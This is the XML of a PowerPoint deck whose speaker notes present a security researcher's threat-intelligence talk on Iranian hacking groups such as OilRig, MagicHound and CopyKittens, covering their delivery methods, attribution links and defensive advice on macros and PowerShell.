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8" r:id="rId1"/>
    <p:sldMasterId id="2147483751" r:id="rId2"/>
    <p:sldMasterId id="2147483709" r:id="rId3"/>
    <p:sldMasterId id="2147483738" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId53"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId54"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="376" r:id="rId5"/>
    <p:sldId id="437" r:id="rId6"/>
    <p:sldId id="382" r:id="rId7"/>
    <p:sldId id="394" r:id="rId8"/>
    <p:sldId id="383" r:id="rId9"/>
    <p:sldId id="379" r:id="rId10"/>
    <p:sldId id="380" r:id="rId11"/>
    <p:sldId id="378" r:id="rId12"/>
    <p:sldId id="384" r:id="rId13"/>
    <p:sldId id="425" r:id="rId14"/>
    <p:sldId id="443" r:id="rId15"/>
    <p:sldId id="439" r:id="rId16"/>
    <p:sldId id="441" r:id="rId17"/>
    <p:sldId id="426" r:id="rId18"/>
    <p:sldId id="386" r:id="rId19"/>
    <p:sldId id="430" r:id="rId20"/>
    <p:sldId id="431" r:id="rId21"/>
    <p:sldId id="442" r:id="rId22"/>
    <p:sldId id="392" r:id="rId23"/>
    <p:sldId id="432" r:id="rId24"/>
    <p:sldId id="388" r:id="rId25"/>
    <p:sldId id="427" r:id="rId26"/>
    <p:sldId id="411" r:id="rId27"/>
    <p:sldId id="401" r:id="rId28"/>
    <p:sldId id="410" r:id="rId29"/>
    <p:sldId id="415" r:id="rId30"/>
    <p:sldId id="416" r:id="rId31"/>
    <p:sldId id="402" r:id="rId32"/>
    <p:sldId id="405" r:id="rId33"/>
    <p:sldId id="434" r:id="rId34"/>
    <p:sldId id="409" r:id="rId35"/>
    <p:sldId id="418" r:id="rId36"/>
    <p:sldId id="417" r:id="rId37"/>
    <p:sldId id="421" r:id="rId38"/>
    <p:sldId id="444" r:id="rId39"/>
    <p:sldId id="436" r:id="rId40"/>
    <p:sldId id="435" r:id="rId41"/>
    <p:sldId id="407" r:id="rId42"/>
    <p:sldId id="408" r:id="rId43"/>
    <p:sldId id="400" r:id="rId44"/>
    <p:sldId id="395" r:id="rId45"/>
    <p:sldId id="398" r:id="rId46"/>
    <p:sldId id="397" r:id="rId47"/>
    <p:sldId id="438" r:id="rId48"/>
    <p:sldId id="412" r:id="rId49"/>
    <p:sldId id="414" r:id="rId50"/>
    <p:sldId id="399" r:id="rId51"/>
    <p:sldId id="440" r:id="rId5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420" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2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Xie" initials="SX" lastIdx="4" clrIdx="0"/>
  <p:cmAuthor id="2" name="Tom Lancaster" initials="TL" lastIdx="2" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-298559873-944822716-1524291848-616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361"/>
    <a:srgbClr val="4DB3D1"/>
    <a:srgbClr val="8DB02A"/>
    <a:srgbClr val="3C6D8A"/>
    <a:srgbClr val="1F566D"/>
    <a:srgbClr val="0D6D91"/>
    <a:srgbClr val="349ADA"/>
    <a:srgbClr val="BFE9F9"/>
    <a:srgbClr val="1E546B"/>
    <a:srgbClr val="45BE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21" autoAdjust="0"/>
    <p:restoredTop sz="85006" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="122" d="100"/>
          <a:sy n="122" d="100"/>
        </p:scale>
        <p:origin x="1560" y="108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="420"/>
        <p:guide pos="2952"/>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F232875-91D8-4F63-AB4B-749E248073DA}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>12/12/2018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F06903-37DE-4035-93E9-8E68BF84BA7F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3354649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3F9F2E2-7F0E-4464-80D1-205504A84905}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>12/12/2018</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683AF3A-9CD1-4AEC-AE28-A58BC1FA1060}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307131986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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I’d like to start by thanking Virginia and the NATO team for putting on the event, it’s always great to catch up with so many industry peers and talk about threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My name’s Tom Lancaster and I work at Palo Alto Networks, a network security company that sells all kinds of devices you can buy, my job and the job of the team I work in is to continually improve the products we have through research into current threats affecting our customers. As part of that, we’ve had a busy last 6 months or so looking at threats emanating from likely Iranian adversaries, so I thought it’d be best to go over some of the most prevalent threats we see from Iran, particularly as this conference is often very Russia-focused.</a:t>
            </a:r>
          </a:p>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383787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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287175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initially for many of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shamoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> incidents security companies were discovering, there was no known infection vector at least initially, these later became available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first people to link a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shamoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> incident to any public incident were IBM – and they were able to do so via IR data, whilst many other security companies (including ourselves) were not privy to such data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The infection vector in IBM’s case had strong correlation in terms of IOCs to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MagicHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> blog that we released on the same day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We were later able to confirm this analysis via data provided via a customer, and by looking at historical malware infections at customers and correlating them against those customers who were targeted with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shamoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malware.</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254888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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497529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The next question we had was around the relationship between this MAGICHOUND threat actor and the well-established (in research circles) Rocket Kitten.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our February 15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> blog on the MAGICHOUND capability, my colleagues Robert Falcone &amp; Bryan Lee wrote about links between the newly discovered campaign and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>noted overlap between an IP address hosting MAGICHOUND payloads and one that had previously hosted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MPKBot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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solidFill>
                <a:schemeClr val="tx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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure overlaps with no timestamp overlap are not perfect, but there are several which as a minimum implies some sort of cooperation between the attackers we call “MAGICHOUND” and those known as “ROCKET KITTEN”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378724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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In addition to the infrastructure overlap though, we also noted overlap between the LEASH backdoor used by MAGICHOUND and older historical IRC based malware families from Iranian threat actors.</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1561177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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2983247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OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> campaign was first given a public name by some of my colleagues, with a blog in May 2016. The blog gave a pretty good summary of the activity up until that point and much of what is covered in the blog remained accurate throughout 2016 and 2017.</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90625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earliest samples for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> campaign were from February 2015, and utilized a custom dropper and malware, HELMINTH which at the time was written as a C++ binary. The malware itself is fairly novel, as it uses DNS request/responses for command and control, which although popular amongst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> toolkits is often not preferred by real world attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s not clear why, but around early 2016 the attackers shifted their methods to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>favour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scripting languages instead, using malware dropped by documents including macros, which dropped PowerShell variations of the HELMINTH malware instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recently the attackers have been mixing things up a bit more (probably in response to publicity they’ve received. Examples of ways’ they’ve tried to switch things up:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing filename used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using new/unique infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signing their malware with stolen certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using new delivery techniques.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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="500185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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks for the past year have used the same technique over and over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The initial file is an excel document which contains a macro, users are socially engineered into clicking the magic “Enable Content” button. The macro itself nearly always uses the same trick. The regular expression above matches it every single time, essentially it involves storing the malicious code that makes up the malware within a cell in the spreadsheet, and decoding/extracting this.</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976034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piece of malicious code is a VBS script which sets up and runs the actual payload (PowerShell).</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286200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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So </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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1735735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PowerShell backdoor is written to accept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> over DNS and over HTTP, the attackers seem to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>favour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS most of the time, although sometimes they include versions of the backdoor with only HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands are issued based on the responses to DNS requests and responses are collected by the C2 server based on the names requested.</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2747434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life is not always so simple – in some cases the attackers use a Microsoft Compiled Help file to install the malware. CHM files are basically HTML pages that are automatically executed, and in this case the malware the HTML page references a JavaScript file which runs some VBS which mirrors the functionality seen in the Excel document.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791561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attackers also managed to get hold of a digital certificate allowing them to sign their malware, but of course these couldn’t be used to sign excel documents or CHM files, so the attackers had to use executable files, which usually installed the usual PowerShell based malware.</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2943629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when analyzing samples using the certificate one of the samples was not like the others – instead it was a PowerShell downloader which consisted of 3 (!) binaries.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685377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binary was responsible for an initial PowerShell download, as well as downloading and executing a second binary file.</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2832219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file also had a PowerShell one liner in it…</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594796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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file was a signed copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, presumably to affording the attackers legitimacy (many vendors use digital signatures as part of their trust mechanisms)</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965150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attackers even interacted with the VM in our product (note this is not a honeypot system, it is a pretty run-of-the-mill commercial sandbox). So they may not be the smartest attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both PowerShell callbacks resulted in download and execution of separate payloads in our sandbox, and the attacker also performed some basic reconnaissance commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the two initial callbacks in the PowerShell exe is something we’ve observed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CopyKittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do before on several occasions.</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940116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attackers even interacted with the VM in our product (note this is not a honeypot system, it is a pretty run-of-the-mill commercial sandbox). So they may not be the smartest attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both PowerShell callbacks resulted in download and execution of separate payloads in our sandbox, and the attacker also performed some basic reconnaissance commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the two initial callbacks in the PowerShell exe is something we’ve observed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CopyKittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do before on several occasions.</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729733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written about in 2015.</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42447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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547787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attackers even interacted with the VM in our product (note this is not a honeypot system, it is a pretty run-of-the-mill commercial sandbox). So they may not be the smartest attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both PowerShell callbacks resulted in download and execution of separate payloads in our sandbox, and the attacker also performed some basic reconnaissance commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In another case the attacker also downloaded a malware family detected as TEG by Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the two initial callbacks in the PowerShell exe is something we’ve observed CopyKittens do before on several occasions.</a:t>
            </a:r>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350824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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Activity only begins after OPERATION CLEAVER (CYLANCE) whose toolset is never seen again.</a:t>
            </a:r>
          </a:p>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="647333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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2506897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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392099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the less, the overlaps between groups are interesting to observe, and it’s fun to come up with hypotheses</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="923275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with this in mind, that we can explain my thought processes when mapping out the threat actors we started with in beginning.</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36125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best guess at possible relationships between these groups.</a:t>
            </a:r>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="888138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 There are a bunch of things that everyone can do.</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dirty="0"/>
              <a:t>:: Securing PowerShell is a great first start – in a 2007 blog on PowerShell someone at Microsoft even wrote “And I see no need for Unrestricted whatsoever, and wouldn't mind if some future version of Windows PowerShell omitted this overly permissive setting.” Microsoft.</a:t>
            </a:r>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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:: “Block the macro, block the threat” Microsoft.</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154591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874342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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73072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Russian threats are easy to categorise!</a:t>
            </a:r>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3212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Iran threats, not so easy!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3158283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all of the blogs about IRAN, its easy to get mixed up in codenames, particularly if you dig into links between them.</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332296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we’re going to attempt to unpick the SHAMOON-related activity. The initial incident which led to the infamous ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shamoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ name happened in August 2012 at a Saudi Energy company. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0683AF3A-9CD1-4AEC-AE28-A58BC1FA1060}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
